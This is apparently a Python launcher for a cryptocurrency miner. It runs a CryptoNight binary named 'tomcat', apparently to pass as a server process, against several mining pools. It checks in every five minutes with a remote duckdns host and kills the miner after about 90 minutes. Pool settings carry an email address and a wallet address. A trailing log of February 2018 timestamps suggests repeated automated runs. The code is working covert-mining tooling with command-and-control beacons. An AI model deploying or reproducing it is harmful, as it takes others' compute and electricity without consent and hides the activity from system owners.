import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:28:07.112390
#2018-02-17 17:15:08.414405
#2018-02-17 19:04:04.672667
#2018-02-17 20:51:05.054109
#2018-02-17 22:38:04.108811
#2018-02-18 00:21:06.320713
#2018-02-18 02:12:06.610186
#2018-02-18 03:59:03.835946
#2018-02-18 05:47:04.583760
#2018-02-18 07:37:07.517133
#2018-02-18 09:25:06.850511
#2018-02-18 11:12:06.744051
#2018-02-18 12:59:01.350193
#2018-02-18 14:46:06.866727
#2018-02-18 16:34:03.526141
#2018-02-18 18:23:04.092279
#2018-02-18 20:09:06.877648
#2018-02-18 21:56:04.847828
#2018-02-18 23:45:01.581603
#2018-02-19 01:31:04.173859
#2018-02-19 03:19:07.012395
#2018-02-19 05:04:06.444838
#2018-02-19 06:49:05.663682
#2018-02-19 08:39:01.664435
#2018-02-19 10:28:01.468838
#2018-02-19 12:15:10.298954
#2018-02-19 14:03:01.410475
#2018-02-19 15:51:08.645206
#2018-02-19 17:39:06.718198
#2018-02-19 19:27:06.640268
#2018-02-19 21:13:06.574809
#2018-02-19 23:01:05.753032
#2018-02-20 00:44:07.822149
#2018-02-20 02:34:05.458984
#2018-02-20 04:23:05.900557
#2018-02-20 06:07:06.612824
#2018-02-20 07:52:07.862940
#2018-02-20 09:38:05.009864
#2018-02-20 11:22:06.906252
#2018-02-20 13:09:07.876122
#2018-02-20 14:54:07.986405
#2018-02-20 16:40:10.761766
#2018-02-20 18:26:01.819406
#2018-02-20 20:18:06.936461
#2018-02-20 22:05:09.334269
#2018-02-20 23:47:02.025096
#2018-02-21 01:29:05.464291
#2018-02-21 03:18:05.846671
#2018-02-21 05:06:01.480353
#2018-02-21 06:53:07.540807
#2018-02-21 08:39:07.265699
#2018-02-21 10:25:05.162827
#2018-02-21 12:13:05.621363
#2018-02-21 14:02:05.593200
#2018-02-21 15:48:13.889772
#2018-02-21 17:40:07.719466
#2018-02-21 19:26:03.834294
#2018-02-21 21:14:06.651671
#2018-02-21 23:01:05.720826
#2018-02-22 00:50:10.739705
#2018-02-22 02:38:06.012604
#2018-02-22 04:24:02.097752
#2018-02-22 06:10:08.572768
#2018-02-22 07:56:01.329877
#2018-02-22 09:45:06.502945
#2018-02-22 11:29:04.316427
#2018-02-22 13:14:07.850397
#2018-02-22 15:04:06.593675
#2018-02-22 16:48:05.497105
#2018-02-22 18:34:04.898140
#2018-02-22 20:26:08.081936
#2018-02-22 22:12:08.361744
#2018-02-22 23:59:07.430907
#2018-02-23 01:47:02.201078
#2018-02-23 03:32:04.225144
#2018-02-23 05:17:05.544340
#2018-02-23 07:04:06.086154
#2018-02-23 08:54:01.622589
#2018-02-23 11:18:06.770934
#2018-02-23 13:11:01.181363
#2018-02-23 14:56:01.657062
#2018-02-23 16:45:09.600969
#2018-02-23 18:42:09.218338
#2018-02-23 20:28:04.841156
#2018-02-23 22:16:01.859057
#2018-02-24 00:01:01.636486
#2018-02-24 01:51:01.792346
#2018-02-24 03:42:02.174158
#2018-02-24 05:26:08.405858
#2018-02-24 07:13:05.515240
#2018-02-24 09:01:01.841132
#2018-02-24 11:01:05.521349
#2018-02-24 12:49:05.065798
#2018-02-24 14:38:07.539334
#2018-02-24 16:29:05.448710
#2018-02-24 18:20:01.815936
#2018-02-24 20:06:07.869342
#2018-02-24 21:49:07.653064
#2018-02-25 00:50:06.279509
#2018-02-25 04:39:04.905266
#2018-02-25 08:05:01.453308